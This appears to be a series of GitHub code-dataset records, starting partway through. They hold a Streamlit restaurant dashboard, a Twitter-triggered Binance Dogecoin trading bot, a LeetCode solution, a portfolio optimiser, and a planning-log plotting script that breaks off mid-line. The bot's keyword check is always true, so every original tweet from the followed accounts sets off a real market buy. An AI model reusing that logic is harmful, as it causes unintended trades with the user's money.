convert_to_dollar(x['Currency'], x['Average Cost for two']), axis=1)\n \n return df1\n\nst.set_page_config(page_title='City View',\n layout='wide',\n initial_sidebar_state='expanded',\n page_icon=':cityscape:')\n\n# Lendo o arquivo e limpando o data frame\ndf = pd.read_csv('zomato.csv')\ndf1 = clear_data(df)\n\n# Streamlit\n# Barra lateral\n#st.sidebar.image(Image.open('pineapple.jpg'), width=60)\n#st.sidebar.markdown('# Curry Company')\n#st.sidebar.markdown('## Fastest Delivery in Town')\n#st.sidebar.markdown(\"\"\"---\"\"\")\n\nst.sidebar.markdown('## Filter')\ncountryList = st.sidebar.multiselect('Which countries do you want to view?',\n ['Australia', 'Brazil', 'Canada', 'England', 'India', 'Indonesia', 'New Zeland',\n 'Philippines', 'Qatar', 'Singapure', 'South Africa', 'Sri Lanka', 'Turkey',\n 'United Arab Emirates', 'United States of America'],\n default=['Brazil', 'England', 'India', 'Turkey', 'United States of America'])\ndf1 = df1.loc[df1['Country Name'].isin(countryList), :]\n\nst.sidebar.markdown(\"\"\"---\"\"\")\nst.sidebar.markdown('#### Powered by FNunes')\n\n# Layout principal\nst.header(':cityscape: City View')\n# https://streamlit-emoji-shortcodes-streamlit-app-gwckff.streamlit.app/\nwith st.container():\n # Top 10 cidades com mais restaurantes na base de dados.\n dfCity = df1.loc[:, ['Country Name', 'City', 'Restaurant ID']].groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Restaurant ID', ascending=False).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Restaurant ID': 'Qty of Restaurants'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Restaurants', color='Country', title='Qty of Restaurants by Country'), use_container_width=True)\n\nwith st.container():\n col1, col2 = st.columns(2)\n with col1:\n # Gráfico de barras com a quantidade de restaurantes com avaliação acima de 4 por cidade,\n # com cores diferentes para cada país.\n dfCity = df1.loc[df1['Aggregate rating']>=4, ['Country Name', 'City', 'Restaurant ID']].groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Restaurant ID', ascending=False).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Restaurant ID': 'Qty of Restaurants'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Restaurants', color='Country', title='Qty of Restaurants over 4.0'), use_container_width=True)\n\n with col2:\n # Gráfico de barras com a quantidade de restaurantes com avaliação abaixo de 2.5 por cidade,\n # com cores diferentes para cada país.\n dfCity = df1.loc[df1['Aggregate rating']<2.5, ['Country Name', 'City', 'Restaurant ID']].groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Restaurant ID', ascending=True).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Restaurant ID': 'Qty of Restaurants'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Restaurants', color='Country', title='Qty of Restaurants under 2.5'), use_container_width=True)\n \nwith st.container():\n # Gráfico de barras com as top 10 cidades com mais tipos de culinária diferentes, com\n # cores diferentes para cada país.\n dfCity = df1.loc[:, ['Country Name', 'City', 'Cuisines']].drop_duplicates().groupby(['Country Name', 'City']).count()\n dfCity = dfCity.sort_values('Cuisines', ascending=False).reset_index()\n dfCity.rename(columns = {'Country Name': 'Country', 'Cuisines': 'Qty of Cuisines'}, inplace=True)\n st.plotly_chart(px.bar(dfCity.head(10), x='City', y='Qty of Cuisines', color='Country', title='Qty of Cuisines'), use_container_width=True)","repo_name":"fbarros1b/restaurants","sub_path":"pages/view2cities.py","file_name":"view2cities.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27090655657","text":"import tweepy\r\nimport time \r\nimport pprint\r\nimport secrets\r\nimport sys\r\nimport config\r\nimport math\r\nfrom binance.client import Client\r\n\r\n\r\n#Note: how global vars work\r\n#TODO improvements !! use limit sells!! they are safer! as market sells dont work if the price is dumping HARD or mooning HARD! \r\n#in those extreme cases you are forced to limit buy/sell \r\n\r\nMyTwitterId = '499189739' #my own personal twitter id \r\nElonMustTwitterId = '44196397' #ElonMusk twitter id \r\nexpendableUSDT = 300 #USDT willing to allow the bot to spend to dogecoin\r\nbaughtDoges = 0. #ammount of doges baught\r\n\r\n#TODO once i have a fix ip get allow access with the key ONLY FROM THAT IP ADDRESS ( for extra security)\r\n\r\n#Connect to twitter API \r\nauth = tweepy.OAuthHandler(config.twAPIKey, config.twAPISKEY)\r\nauth.set_access_token(config.twAPIToken, config.twAPISToken)\r\napi = tweepy.API(auth)\r\n\r\n#Connect to Binance API \r\nclient = Client(config.BkEY, config.bSKey)\r\nprint(\"connected to API's\")\r\n\r\n#Filters out mentions and RTs, only keeps tweets made by the creator\r\ndef from_creator(status): \r\n if hasattr(status, 'retweeted_status'):\r\n return False\r\n elif status.in_reply_to_status_id != None:\r\n return False\r\n elif status.in_reply_to_screen_name != None:\r\n return False\r\n elif status.in_reply_to_user_id != None:\r\n return False\r\n else:\r\n return True\r\n\r\n#Gets current price of DOGE IN USDT \r\ndef getCurPrice(): \r\n prices = client.get_all_tickers()\r\n for i in range(len(prices)):\r\n if(prices[i]['symbol'] == 'DOGEUSDT') : \r\n return float(prices[i]['price'])\r\n return 0\r\n\r\n#return how many doges i can buy with my usdt (we use a 0.1 safety margin) and truncate to and int for simplicity\r\ndef usdtToDoges(usdt) :\r\n return int(usdt/(getCurPrice() + 0.1))\r\n\r\n#Beggins tracking price of DOGE and sells if price drops by more then 35% of highest price \r\ndef launchPriceTracker(curHighestPrice, startPrice): \r\n time.sleep(120.) #check every 2 minutes\r\n \r\n highestPrice = curHighestPrice\r\n curPrice = getCurPrice()\r\n if(curPrice == 0): exit() #error\r\n if(highestPrice < curPrice):\r\n highestPrice = curPrice #update highest price since buy order\r\n \r\n priceDiffToCur = (curPrice - startPrice) \r\n priceDiffToHighest = (highestPrice - startPrice) \r\n\r\n #if current price or highest price if lower then starting price (this means price went down instead of up) then sell\r\n if(priceDiffToCur < -0.2 or priceDiffToHighest < -0.2 ): \r\n order = client.order_market_sell(symbol='DOGEUSDT', quantity = baughtDoges)\r\n sys.stdout.flush()\r\n print(order)\r\n exit()\r\n\r\n \r\n if(priceDiffToHighest != 0 and math.fabs((priceDiffToCur)/(priceDiffToHighest)) < 6.5/10.) : #if fall by 35% below local highest then sell \r\n print(\"tries to sell doges the div is: \" + str(priceDiffToCur) +\" \"+ str(priceDiffToHighest) + \" \"+ str((priceDiffToCur)/(priceDiffToHighest)))\r\n order = client.order_market_sell(symbol='DOGEUSDT', quantity = baughtDoges) #todo thing about cashing out same amount of doges i baught\r\n print(order)\r\n exit()\r\n\r\n launchPriceTracker(highestPrice, startPrice)\r\n\r\nclass MyStreamListener(tweepy.StreamListener):\r\n\r\n def on_status(self, status):\r\n if from_creator(status): \r\n tweet = status.text.lower()\r\n if \"doge\" or \"hodl\" or \"coin\" or \"dog\" or \"hold\" or \"bark\" or \"shiba\" \\\r\n or \"inu\" in tweet:\r\n quantityOfDogesToBuy = usdtToDoges(expendableUSDT)\r\n order = client.order_market_buy(symbol='DOGEUSDT', quantity = quantityOfDogesToBuy) #TODO smarter way of defining nDogeCoins upper bounded by my quantitiy dogecoins \r\n print(order) \r\n global baughtDoges \r\n baughtDoges = quantityOfDogesToBuy #record the number of doges baught\r\n print(\"order status: \" + order['status'])\r\n sys.stdout.flush()\r\n startPrice = getCurPrice()\r\n if(order['status'] == 'FILLED'):\r\n launchPriceTracker(startPrice, startPrice)\r\n else:\r\n exit() #error\r\n return True\r\n return True\r\n\r\n\r\n def on_error(self, status_code):\r\n if status_code == 420:\r\n print(\"Error 420\")\r\n #returning False in on_error disconnects the stream\r\n return False\r\n \r\n#create stream and keep twitter accounts i choose to follow\r\nmyStreamListener = MyStreamListener()\r\nmyStream = tweepy.Stream(auth = api.auth, listener=myStreamListener) \r\nmyStream.filter(follow=[MyTwitterId, ElonMustTwitterId])\r\n#add tesla account, spacex and also companies, mavericks, mark cuban, companies who might it, also add coinbase!!! ect.. (try to asses if the tweets are good can also be an improvement)\r\n\r\nprint(\"listening...\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#possible optimisations : check more the one user, get more words, organise code better maybe even use 1 folder for classes, HIDE CREDS ect.. \r\n\r\n#Debugging prints\r\n#print(\"startPrice: \" + str(startPrice))\r\n#print(\"curPrice :\" + str(curPrice))\r\n#print(\"highestPrice: \" + str(highestPrice))\r\n\r\n#=============EXAMPLES OF HOW TO WORK WITH BINANCE API =======================================================================================================\r\n#info = client.get_symbol_info('BNBBTC')\r\n#for i in info:\r\n# print(i)\r\n\r\n#info = client.get_account()\r\n#print(info)\r\n#bal = info['balances']\r\n#for b in bal: \r\n# if float(b['free']) > 0:\r\n# print(b)\r\n\r\n#gets last trades with this pair (BNBBTC) buy = BUY BNB (SELL BTC) (i think)\r\n#trades = client.get_my_trades(symbol = 'BNBBTC')\r\n\r\n#GIVEN THE DIFFERENT STRUCTURE OF THE JSON here its a list of jsons, we need to access the jsons with indices and then can use the field (for balance it was a json with other jsons inside)\r\n#prices = client.get_all_tickers()\r\n#print(prices)\r\n#for i in range(len(prices)):\r\n# if(prices[i]['symbol'] == 'DOGEUSDT') : \r\n# print(prices[i]['price'])\r\n\r\n#The tutorial i used, hes got alot of other vids on blockahin or how\r\n#to create my own crypto \r\n# https://www.youtube.com/watch?v=3uxAn7EBSS0&t=196s\r\n#to make an order its easy just check documentation on binance https://python-binance.readthedocs.io/en/latest/binance.html","repo_name":"Gianniii/TwitterBinanceDogecoinBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22959020188","text":"class Solution:\n def validMountainArray(self, arr: List[int]) -> bool:\n N = len(arr)\n i = 0\n \n ## first check edge cases, which means that the peak cannot be the first and the last element\n if N == 0:\n return False\n\n \n ## walk up\n while i + 1 < N and arr[i] < arr[i + 1]:\n i += 1\n \n ## check if the peak is the first or the last \n if i == 0 or i == N - 1:\n return False\n \n ## walk down\n while i + 1 < N and arr[i] > arr[i + 1]:\n i += 1\n \n return i == N - 1\n \n","repo_name":"jenli810006995/365DaysofAlgorithms","sub_path":"Array/941. Valid Mountain Array/Valid_Mountain_Array.py","file_name":"Valid_Mountain_Array.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25976183280","text":"from numpy.core.fromnumeric import ptp\nimport pandas as pd\nimport numpy as np\nimport pandas_datareader.data as web\nimport datetime\nfrom scipy.optimize import minimize\n\n\nif __name__ == '__main__':\n start = datetime.datetime(2021, 5, 10)\n end = datetime.datetime(2021, 6, 10)\n tickets = ['CEVA', 'GOOGL', 'TSLA', 'ZOM']\n tickets = ['FB', 'GOOGL', 'AAPL', 'AMZN',]\n # 'TSLA', 'DIS', 'NVS', 'NVDA', 'TSM', 'KO', 'TXN', 'AMD']\n\n print(\"get data\")\n columns = []\n\n for ticket in tickets:\n data = web.DataReader(ticket, 'yahoo', start, end)\n columns.append(data['Close'])\n\n stocks = pd.concat(columns, axis=1)\n stocks.columns = tickets \n\n print('end get data')\n\n returns = stocks / stocks.shift(1)\n logReturns = np.log(returns)\n\n noOfPortfolios = 100000\n meanLogReturns = logReturns.mean()\n Sigma = logReturns.cov()\n\n weights = np.zeros((noOfPortfolios, len(tickets)))\n expectedReturn = np.zeros(noOfPortfolios)\n expectedVolatility = np.zeros(noOfPortfolios)\n sharpeRatio = np.zeros(noOfPortfolios)\n\n print(\"Sigma\")\n print(Sigma)\n print()\n\n print(\"log returns\")\n print(logReturns)\n print()\n\n print(\"mean log returns\")\n print(meanLogReturns)\n print()\n\n\n for k in range(noOfPortfolios):\n # generate random weights\n w = np.array(np.random.random(len(tickets)))\n w = w / w.sum()\n weights[k, :] = w\n\n # expected log return\n expectedReturn[k] = np.sum(meanLogReturns * w)\n\n # expected volatility\n expectedVolatility[k] = np.sqrt(np.dot(w.T, np.dot(Sigma, w)))\n\n # sharpe ratio\n sharpeRatio[k] = expectedReturn[k] / expectedVolatility[k]\n\n maxIndex = sharpeRatio.argmax()\n\n\n print(f'Return {expectedReturn[maxIndex]}')\n print(f'Volatility {expectedVolatility[maxIndex]}')\n print(f'SharpeRatio {sharpeRatio[maxIndex]}')\n\n\n\n print(f'Weights {weights[maxIndex]}')\n\n print()\n\n for k,v in zip(tickets, weights[maxIndex]):\n print(f'{k:>10} {100*v:6.2f}')\n\n\n def negativeSR(w):\n w = np.array(w)\n R = np.sum(meanLogReturns * w)\n V = np.sqrt(np.dot(w.T, np.dot(Sigma, w)))\n return -(R-0.001)/V\n\n def checkSumToOne(w):\n return np.sum(w) - 1\n\n w0 = np.asarray([.25]*len(tickets))\n bounds = ((0, 1),)*len(tickets)\n constraints = ({'type': 'eq', 'fun': checkSumToOne})\n w_opt = minimize(negativeSR, w0, method='SLSQP', \n bounds=bounds, constraints=constraints,\n options={'disp':True, 'ftol': .0000001})\n\n print()\n for k,v in zip(tickets, w_opt.x):\n print(f'{k:>10} {100*v:6.2f}')\n\n\n print(negativeSR(w0))\n\n","repo_name":"lmpizarro/go-finance","sub_path":"markowitz/opt_max.py","file_name":"opt_max.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24980366800","text":"#!/usr/bin/env python\nimport getopt\nimport sys\nimport re\nimport math\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nimport math\n\n\nbPress = False\n\ndef on_key_press(event):\n\tif event.key ==str(\"n\"):\n\t\tglobal bPress\n\t\tbPress = True\n\ndef getPress():\n\tglobal bPress\n\treturn bPress\n\ndef setPressFalse():\n\tglobal bPress\n\tbPress = False\n\ndef DrawSpline(splnex,splney):\n\trXList = []\n\trYList = []\n\tfor i in range(len(splnex) - 3):\n\t\tfor u in np.arange(0, 1, 0.01):\n\t\t\tN03=(-u**3 + 3*u**2 - 3*u + 1) / 6;\n\t\t\tN13=(3*u**3 - 6*u**2 + 4) / 6;\n\t\t\tN23=(-3*u**3 + 3*u**2 + 3*u + 1)/6;\n\t\t\tN33=u**3/6;\n\t\t\trx=N03 * splnex[i] + N13 * splnex[i+1] + N23 * splnex[i+2] + N33 * splnex[i+3] \n\t\t\try=N03 * splney[i] + N13 * splney[i+1] + N23 * splney[i+2] + N33 * splney[i+3] \n\t\t\trXList.append(rx)\n\t\t\trYList.append(ry)\n\treturn rXList, rYList\n\nclass TracPos:\n\tdef __init__(self):\n\t\tself.GobalX = 0\n\t\tself.GobalY = 0\n\t\tself.GobalHeading = 0\n\t\tself.Curvature = 0\n\t\tself.Distane = 0\n\t\tself.Speedx = 0\n\t\tself.Speedy = 0\n\t\tself.Accx = 0\n\t\tself.Accy = 0\n\n\tdef setData( self,x,y,heading, curvature,dDistance, speedx,speedy,accx,accy):\n\t\tself.GobalX = x\n\t\tself.GobalY = y\n\t\tself.GobalHeading = heading\n\t\tself.Curvature = curvature\n\t\tself.Distane = dDistance\n\t\tself.Speedx = speedx\n\t\tself.Speedy = speedy\n\t\tself.Accx = accx\n\t\tself.Accy = accy\n\n\tdef getX(self):\n\t\treturn self.GobalX\n\n\tdef getY(self):\n\t\treturn self.GobalY\n\n\tdef wirteMatlabData(self,file):\n\t\tfile.write(str(self.GobalX))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.GobalY))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.GobalHeading))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Curvature))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Distane))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Speedx))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Speedy))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Accx))\n\t\tfile.write(\" \")\n\t\tfile.write(str(self.Accy))\n\t\tfile.write(\"\\r\\n\")\n\n\tdef getPrintData(self):\n\t\t# return \"x:\"+str(self.GobalX)+\" y:\"+str(self.GobalY)+\" H:\"+str(self.GobalHeading)+\" C:\"+str(self.Curvature)+\"\\nSx:\"+str(self.Speedx)+\" Sy:\"+str(self.Speedy)+\" Ax:\"+str(self.Accx)+\" Ay:\"+str(self.Accy)\n\t\treturn \"H:\"+str(self.GobalHeading)+\" C:\"+str(self.Curvature)+\" Sx:\"+str(self.Speedx)+\" Sy:\"+str(self.Speedy)\t\t\t\t\t\n\nclass SplinePos:\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\n\tdef set( self,x,y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef getX(self):\n\t\treturn self.x\n\n\tdef getY(self):\n\t\treturn self.y\n\n\tdef printPos(self):\n\t\tprint(\"x:\"+str(self.x)+\"y:\"+str(self.y))\n\nclass VPPos:\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.heading = 0\n\n\tdef set( self,x,y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef setAll( self,x,y,heading):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.heading = heading\t\n\n\tdef getX(self):\n\t\treturn self.x\n\n\tdef getY(self):\n\t\treturn self.y\n\n\tdef getHeading(self):\n\t\treturn self.heading\t\n\n\tdef printPos(self):\n\t\treturn \"x:\"+str(self.x)+\" y:\"+str(self.y)+\" heading:\"+str(self.heading)\n\nclass FrenetPos:\n\tdef __init__(self):\n\t\tself.dDistance = 0\n\t\tself.dSpeed = 0\n\t\tself.dAcceleration = 0\n\t\tself.sDistance = 0\n\t\tself.sSpeed = 0\n\t\tself.sAcceleration = 0\n\t\tself.sStopDistance = 0\n\t\tself.Width = 0\n\t\tself.TargetSpeed = 0\n\n\tdef set( self,dd,ds,da,sd,ss,sa,stops,widthd,tspeed):\n\t\tself.dDistance = dd\n\t\tself.dSpeed = ds\n\t\tself.dAcceleration = da\n\t\tself.sDistance = sd\n\t\tself.sSpeed = ss\n\t\tself.sAcceleration = sa\n\t\tself.sStopDistance = stops\n\t\tself.Width = widthd\n\t\tself.TargetSpeed = tspeed\n\t\n\tdef getPrint(self):\n\t\treturn \"Dd:\"+str(self.dDistance)+\" Ds:\"+str(self.dSpeed)+\" Da:\"+str(self.dAcceleration)+\" Sd:\"+str(self.sDistance)+\" Ss:\"+str(self.sSpeed)+\" Sa:\"+str(self.sAcceleration)+\" SStop:\"+str(self.sStopDistance)+\" DW:\"+str(self.Width)+\" Ts:\"+str(self.TargetSpeed)\n\nclass Frame:\n\tdef __init__(self):\n\t\tself.VPPos = VPPos()\n\t\tself.MatchPos = VPPos()\n\t\tself.GobalPos = VPPos()\n\t\tself.TList = []\n\t\tself.CandidateList = []\n\t\tself.FrenetList = []\n\t\tself.FrenetPos = FrenetPos()\n\n\tdef setVP( self, vp):\n\t\tself.VPPos = vp\n\n\tdef getVP(self):\n\t\treturn self.VPPos\n\n\tdef setGobalPos( self, vp):\n\t\tself.GobalPos = vp\n\n\tdef getGobalPos(self):\n\t\treturn self.GobalPos\t\n\n\tdef setMatchPos( self, vp):\n\t\tself.MatchPos = vp\n\n\tdef getMatchPos(self):\n\t\treturn self.MatchPos\n\n\tdef setFrenetPos( self, fp):\n\t\tself.FrenetPos = fp\n\n\tdef getFrenetPos(self):\n\t\treturn self.FrenetPos\t\n\n\tdef getTracPos(self):\n\t\treturn self.TList\n\n\tdef appendTracPos(self, tpos):\n\t\tself.TList.append(tpos)\n\n\tdef appendCandidatePos(self, tpos):\n\t\tself.CandidateList.append(tpos)\t\n\n\tdef getTXList(self):\n\t\txlist = []\n\t\tfor tp in self.TList:\n\t\t\txlist.append(tp.getX())\n\t\treturn xlist\n\n\tdef getTYList(self):\n\t\tylist = []\n\t\tfor tp in self.TList:\n\t\t\tylist.append(tp.getY())\n\t\treturn ylist\n\n\tdef getTYListPrint(self):\n\t\tstrdata = \"\"\n\t\tfor i in range(len(self.TList)):\n\t\t\tstrdata = strdata + self.TList[i].getPrintData()+\"\\n\"\n\t\treturn strdata\t\n\n\tdef getCXList(self):\n\t\txlist = []\n\t\tfor tp in self.CandidateList:\n\t\t\txlist.append(tp.getX())\n\t\treturn xlist\n\n\tdef getCYList(self):\n\t\tylist = []\n\t\tfor tp in self.CandidateList:\n\t\t\tylist.append(tp.getY())\n\t\treturn ylist\n\n\tdef printFrame(self):\n\t\tself.VPPos.printPos()\n\nshow_animation = True\nshow_trac = True\npltId = 1\nregexTracPos = re.compile('\\[Planning\\]x:(?P[0-9\\-\\.]+) y:(?P[0-9\\-\\.]+) heading:(?P[0-9\\-\\.]+) curvature:(?P[0-9\\-\\.]+) dDistance:(?P[0-9\\-\\.]+) speedx:(?P[0-9\\-\\.]+) speedy:(?P[0-9\\-\\.]+) accx:(?P[0-9\\-\\.]+) accy:(?P[0-9\\-\\.]+)')\nregexSplineStart = re.compile('===CubicSpline points start')\nregexSplineEnd = re.compile('===CubicSpline points end')\nregexSplinePos = re.compile('setControlPoints points: x:(?P[0-9\\-\\.]+) y:(?P[0-9\\-\\.]+)')\nregexVPLocalPos = re.compile('Local point X:(?P[0-9\\-\\.]+) Y:(?P[0-9\\-\\.]+)')\nregexCandidatePos = re.compile('getBestCandidatePos List data:(?P[0-9\\-\\.]+) ,(?P[0-9\\-\\.]+) ,(?P[0-9\\-\\.]+)')\nregexFrenetStatusPos = re.compile('FrenetStatus D:(?P[0-9\\-\\.]+) DS:(?P[0-9\\-\\.]+) DA:(?P[0-9\\-\\.]+) S:(?P[0-9\\-\\.]+) SS:(?P[0-9\\-\\.]+) SA:(?P[0-9\\-\\.]+) SStop:(?P[0-9\\-\\.]+) DWidth:(?P[0-9\\-\\.]+) TSS:(?P[0-9\\-\\.]+)')\nregexMatchedPos = re.compile('getMatchPoint point x:(?P[0-9\\-\\.]+) y:(?P[0-9\\-\\.]+) heading:(?P[0-9\\-\\.]+)')\nregexGobalPos = re.compile('Gobal Wgs getLongitude:(?P[0-9\\-\\.]+) getLatitude:(?P[0-9\\-\\.]+)')\n\nif __name__ == '__main__':\n\topts, args = getopt.getopt(sys.argv[1:], 'hn:w:', ['name=', 'word=', 'help'])\n\tcolor = ['ob', 'og','or','oc','om','oy','ok','ow']\n\tTracPosList = []\n\tSplineList = []\n\tVPPosList = []\n\ttotalFrame = [] ##list list\n\tFrameList = []\n\n\tbFirst = True\n\tfm = Frame()\n\tgroupIdx = 0\n\tif len(sys.argv) < 2:\n\t\tprint(\"#please input file#\")\n\telse:\n\n\t\tfilenameRead = os.getcwd() + \"/\"+ sys.argv[1]\n\t\tfile = open(filenameRead, \"r\")\n\t\tfilenameTracPos = os.getcwd() + \"/\" + \"TracPos.txt\"\n\t\tfilenameTracPosW = open(filenameTracPos, \"w\")\n\t\tprint (\"convet file:\"+ file.name)\n\t\tline = file.readline()\n\t\tprint (\"resolving.................\")\n\t\twhile line:\n\t\t\tmatched = re.search(regexTracPos, line)\n\t\t\tSplineStartmatched = re.search(regexSplineStart, line)\n\t\t\tSplineEndmatched = re.search(regexSplineEnd, line)\t\n\t\t\tSplinePosmatched = re.search(regexSplinePos, line)\n\t\t\tVPLocalPosmatched = re.search(regexVPLocalPos, line)\n\t\t\tCandidatePosmatched = re.search(regexCandidatePos, line)\n\t\t\tFrenetStatusPosmatched = re.search(regexFrenetStatusPos, line)\n\t\t\tMatchedPosmatched = re.search(regexMatchedPos, line)\n\t\t\tGobalPosmatched = re.search(regexGobalPos, line)\n\t\t\tif matched:\n\t\t\t\tps = TracPos()\n\t\t\t\tx = matched.group(\"x\")\n\t\t\t\ty = matched.group(\"y\")\n\t\t\t\theading = matched.group(\"heading\")\n\t\t\t\tcurvature = matched.group(\"curvature\")\n\t\t\t\tdDistance = matched.group(\"dDistance\")\n\t\t\t\tspeedx = matched.group(\"speedx\")\n\t\t\t\tspeedy = matched.group(\"speedy\")\n\t\t\t\taccx = matched.group(\"accx\")\n\t\t\t\taccy = matched.group(\"accy\")\n\t\t\t\tps.setData(x,y,heading, curvature,dDistance, speedx,speedy,accx,accy)\n\t\t\t\tfm.appendTracPos(ps)\n\t\t\tif SplineStartmatched:\n\t\t\t\tif bFirst:\n\t\t\t\t\tbFirst = False\n\t\t\t\telse:\n\t\t\t\t\ttotalFrame.append(FrameList)\n\t\t\t\t\tFrameList = []\n\t\t\t\tCurrentList = []\t\t\t\t\n\t\t\tif SplineEndmatched:\n\t\t\t\tSplineList.append(CurrentList)\n\t\t\tif GobalPosmatched:\n\t\t\t\t#print(\"yue changjiang append adddddddd##################\")\n\t\t\t\tFrameList.append(fm)\n\t\t\t\tfm = Frame()\n\t\t\t\tps = VPPos()\n\t\t\t\tps.set(float(GobalPosmatched.group(\"x\")),float(GobalPosmatched.group(\"y\")))\n\t\t\t\tfm.setGobalPos(ps)\t\n\t\t\tif SplinePosmatched:\n\t\t\t\tps = SplinePos()\n\t\t\t\tps.set(float(SplinePosmatched.group(\"x\")),float(SplinePosmatched.group(\"y\")))\n\t\t\t\tCurrentList.append(ps)\n\t\t\tif VPLocalPosmatched:\n\t\t\t\tps = VPPos()\n\t\t\t\tps.set(float(VPLocalPosmatched.group(\"x\")),float(VPLocalPosmatched.group(\"y\")))\n\t\t\t\tfm.setVP(ps)\n\t\t\tif MatchedPosmatched:\n\t\t\t\tps = VPPos()\n\t\t\t\tps.setAll(float(MatchedPosmatched.group(\"x\")),float(MatchedPosmatched.group(\"y\")),float(MatchedPosmatched.group(\"heading\")))\n\t\t\t\tfm.setMatchPos(ps)\n\t\t\tif FrenetStatusPosmatched:\n\t\t\t\tfp = FrenetPos()\n\t\t\t\tfp.set(float(FrenetStatusPosmatched.group(\"D\")),float(FrenetStatusPosmatched.group(\"DS\")),float(FrenetStatusPosmatched.group(\"DA\")),float(FrenetStatusPosmatched.group(\"S\")),float(FrenetStatusPosmatched.group(\"SS\")),float(FrenetStatusPosmatched.group(\"SA\")),float(FrenetStatusPosmatched.group(\"SStop\")),float(FrenetStatusPosmatched.group(\"DWidth\")),float(FrenetStatusPosmatched.group(\"TSS\")))\n\t\t\t\tfm.setFrenetPos(fp)\n\t\t\tif CandidatePosmatched:\n\t\t\t\tps = VPPos()\n\t\t\t\tps.setAll(float(CandidatePosmatched.group(\"x\")),float(CandidatePosmatched.group(\"y\")),float(CandidatePosmatched.group(\"heading\")))\n\t\t\t\tfm.appendCandidatePos(ps)\n\t\t\tline = file.readline()\n\t\t\n\t\tfor i in TracPosList:\n\t\t\ti.wirteMatlabData(filenameTracPosW)\n\t\ttotalFrame.append(FrameList)\n\t\tfile.close()\n\t\tfilenameTracPosW.close()\n\n\t\tfor sl in SplineList:\n\t\t\tsplnex = []\n\t\t\tsplney = []\n\t\t\tfor i in range(len(sl)):\n\t\t\t\t#if i != 0 and i != len(sl) -1:\n\t\t\t\tsplnex.append(sl[i].getX())\n\t\t\t\tsplney.append(sl[i].getY())\n\t\t\tprint(\"yue changjiang start ##################\")\t\t\n\t\t\tprint(splnex)\n\t\t\tprint(splney)\n\t\t\tprint(\"yue changjiang end ##################\")\n\n\t\t\t#DrawSpline(splnex, splney)\n\t\t\ttx, ty = DrawSpline(splnex, splney)\n\n\t\t\tif show_animation:\n\t\t\t\tplt.figure(pltId)\n\t\t\t\tpltId = pltId + 1\n\t\t\t\tplt.title(\"Global Spline Path\")\n\t\t\t\tplt.plot(splnex, splney, 'b-')\n\t\t\t\tfor i in range(len(splnex)):\n\t\t\t\t\tplt.plot(splnex[i], splney[i], color[i%8],label=str(i))\t\t\t\t\t\n\t\t\t\tplt.plot(tx, ty, '-r')\n\t\t\t\tplt.axis('equal')\t\t\t\t\n\t\t\t\tplt.legend()\n\t\t\t\t\n\t\t\t\t#plt.show()\n\t\t\t\t#plt.savefig('global_path.png')\n\t\t\t\t\n\t\t\t\txarea = 20\n\t\t\t\tyarea = 20\n\t\t\t\tif show_animation:\n\t\t\t\t\tplt.figure(pltId)\n\t\t\t\t\tplt.gcf().canvas.mpl_connect('key_press_event',on_key_press)\n\t\t\t\t\tpltId = pltId + 1\n\t\t\t\t\tFrameList = totalFrame[groupIdx]\n\t\t\t\t\tfor i in range(len(FrameList)):\n\t\t\t\t\t\tif i != 0:\n\t\t\t\t\t\t\tframeData = FrameList[i]\n\t\t\t\t\t\t\tframeData.printFrame()\n\t\t\t\t\t\t\tstatus = frameData.getFrenetPos().getPrint()\n\t\t\t\t\t\t\tplt.title(\"Replay\")\n\t\t\t\t\t\t\tplt.xlabel(\"Status:\"+status+\"\\nMatchPos:\"+frameData.getMatchPos().printPos()+\"\\nGobalPos:\"+frameData.getGobalPos().printPos(),fontsize = 10)\n\t\t\t\t\t\t\t#plt.ylabel(frameData.getTYListPrint(),fontsize = 10,verticalalignment=\"bottom\",horizontalalignment=\"right\",rotation=\"horizontal\")\n\t\t\t\t\t\t\tif show_trac:\n\t\t\t\t\t\t\t\tplt.ylabel(frameData.getTYListPrint(),fontsize = 10,verticalalignment=\"center\",horizontalalignment=\"right\",rotation=\"horizontal\")\n\t\t\t\t\t\t\t#plt.xlabel(\"Status:\"+status+\"\\nGobalPos:\"+frameData.getGobalPos().printPos(),fontsize = 10)\n\t\t\t\t\t\t\tplt.plot(tx, ty, '-r')\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tplt.plot(frameData.getMatchPos().getX(), frameData.getMatchPos().getY(), \"bo\",label='Match Pos')\n\t\t\t\t\t\t\tplt.plot(frameData.getVP().getX(), frameData.getVP().getY(), \"rD\",label='VP Pos')\n\t\t\t\t\t\t\tplt.plot(frameData.getTXList(), 